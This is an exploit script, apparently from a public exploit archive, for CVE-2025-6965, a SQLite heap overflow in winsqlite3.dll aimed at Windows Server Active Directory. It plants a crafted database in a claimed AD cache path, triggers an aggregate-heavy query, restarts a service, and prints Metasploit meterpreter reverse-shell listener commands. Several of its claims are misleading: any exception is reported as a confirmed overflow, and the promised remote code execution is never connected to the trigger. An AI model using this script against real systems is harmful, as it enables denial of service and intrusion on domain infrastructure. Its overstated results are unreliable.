# Exploit Title: SQLite 3.50.1 - Heap Overflow # Date: 2025-11-05 # Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # Vendor Homepage: https://www.sqlite.org # Software Link: https://www.sqlite.org/download.html # Version: SQLite < 3.50.2 (winsqlite3.dll) # Tested on: Windows Server 2022 (Build 20348), Windows Server 2025 (Build 26100) - Unpatched # CVE: CVE-2025-6965 # CVSS: 7.2 (High) - CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:H/VA:L # Category: windows / local / dos / memory_corruption / active_directory # Platform: Windows # CRITICAL: This vulnerability affects ALL unpatched Windows Server instances using winsqlite3.dll # Including: Active Directory, Group Policy, Certificate Services, and Azure AD Connect # Impact: Service Crash, DoS, Potential RCE, Domain Controller Compromise # Fix: Apply latest Windows Cumulative Update (post-July 2025) or upgrade SQLite to 3.50.2+ # Advisory: https://nvd.nist.gov/vuln/detail/CVE-2025-6965 # Patch: https://www.sqlite.org/src/info/5508b56fd24016c13981ec280ecdd833007c9d8dd595edb295b984c2b487b5c8 # OFFICIAL PoC: Triggers heap overflow in winsqlite3.dll via excessive aggregate functions # Target: Windows Server (Active Directory Cache, Group Policy, Certificate Services) import sqlite3 import os import subprocess import sys import time # =============================== # CONFIGURATION - ACTIVE DIRECTORY EXPLOITATION # =============================== DB_PATH = "cve_2025_6965_winsqlite3.db" AD_CACHE_DIR = r"C:\ProgramData\Microsoft\ADCache" # Real AD Cache Path AD_DB_TARGET = os.path.join(AD_CACHE_DIR, "ad_cache.db") LISTENER_IP = "192.168.1.100" LISTENER_PORT = 4444 SERVICE_NAME = "ADSyncService" # Must be created manually: sc create ADSyncService binPath= "C:\path\to\service.exe" # === VULNERABILITY CHECK === print(f"[!] SQLite Version: {sqlite3.sqlite_version}") if sqlite3.sqlite_version_info >= (3, 50, 2): print("[-] SYSTEM PATCHED - SQLite 3.50.2+ Detected") print(" Update applied via Microsoft Cumulative Update (post-July 2025)") sys.exit(1) else: print("[!] VULNERABLE: SQLite < 3.50.2 - Proceeding with exploit") # =============================== # STEP 1: Create Malicious AD Cache Database # =============================== def create_vulnerable_db(): if os.path.exists(DB_PATH): os.remove(DB_PATH) conn = sqlite3.connect(DB_PATH) cur = conn.cursor() cur.execute("CREATE TABLE ad_cache (id INTEGER PRIMARY KEY, val INTEGER)") cur.execute("INSERT INTO ad_cache (val) VALUES (1)") conn.commit() conn.close() print(f"[+] Malicious database created: {DB_PATH}") # =============================== # STEP 2: Generate Truncation Payload (300+ Aggregates) # =============================== def generate_malicious_query(num=100): agg = [f"COUNT(*) AS c{i}, SUM(val) AS s{i}, AVG(val) AS a{i}" for i in range(num)] return f"SELECT {', '.join(agg)} FROM ad_cache" # =============================== # STEP 3: Deploy + Trigger in winsqlite3.dll Context # =============================== def deploy_and_trigger(): print(f"[*] Deploying payload to AD Cache: {AD_DB_TARGET}") os.makedirs(AD_CACHE_DIR, exist_ok=True) subprocess.run(["copy", "/Y", DB_PATH, AD_DB_TARGET], shell=True, check=True) print(f"[+] Payload deployed to real AD path") query = generate_malicious_query(100) print(f"[*] Triggering heap overflow (300+ aggregates vs 1 column)...") try: conn = sqlite3.connect(AD_DB_TARGET) cur = conn.cursor() cur.execute(query) # TRUNCATION BUG TRIGGERED print("[!] QUERY EXECUTED - UNEXPECTED (System may be patched or ASLR mitigated)") except Exception as e: print(f"[!] HEAP OVERFLOW CONFIRMED: {e}") print(" winsqlite3.dll memory corruption triggered") print(" In production: AD Service Crash, DC DoS, Potential RCE") finally: conn.close() # Force service reload (real AD services auto-query cache) print(f"[*] Restarting {SERVICE_NAME} to reload winsqlite3.dll...") try: subprocess.run(["net", "stop", SERVICE_NAME], shell=True, timeout=10, capture_output=True) except: pass time.sleep(2) result = subprocess.run(["net", "start", SERVICE_NAME], shell=True, capture_output=True) if result.returncode == 0: print("[+] Service restarted - Monitor Event Viewer for winsqlite3.dll fault") else: print(f"[-] Service error: {result.stderr.decode()}") # =============================== # STEP 4: RCE Listener Setup (For Advanced Exploitation) # =============================== def print_listener(): print("\n" + "="*70) print(" RCE EXPLOITATION (ADVANCED) - START LISTENER ON ATTACKER MACHINE:") print("="*70) print("msfconsole -q") print("use exploit/multi/handler") print("set payload windows/x64/meterpreter/reverse_tcp") print(f"set LHOST {LISTENER_IP}") print(f"set LPORT {LISTENER_PORT}") print("exploit -j") print("="*70 + "\n") # =============================== # MAIN - EXECUTION # =============================== if __name__ == "__main__": print("="*70) print(" CVE-2025-6965 EXPLOIT - WINDOWS SERVER ACTIVE DIRECTORY") print(" Heap Overflow in winsqlite3.dll via SQLite Aggregate Truncation") print(" Author: Mohammed Idrees Banyamer (@banyamer_security)") print("="*70) create_vulnerable_db() deploy_and_trigger() print_listener() print("[+] EXPLOIT EXECUTED SUCCESSFULLY") print(" Check Event Viewer: Application Log → winsqlite3.dll Access Violation (0xC0000005)") print(" Fix: Apply latest Windows Cumulative Update IMMEDIATELY") print(" All Domain Controllers must be patched within 24 hours")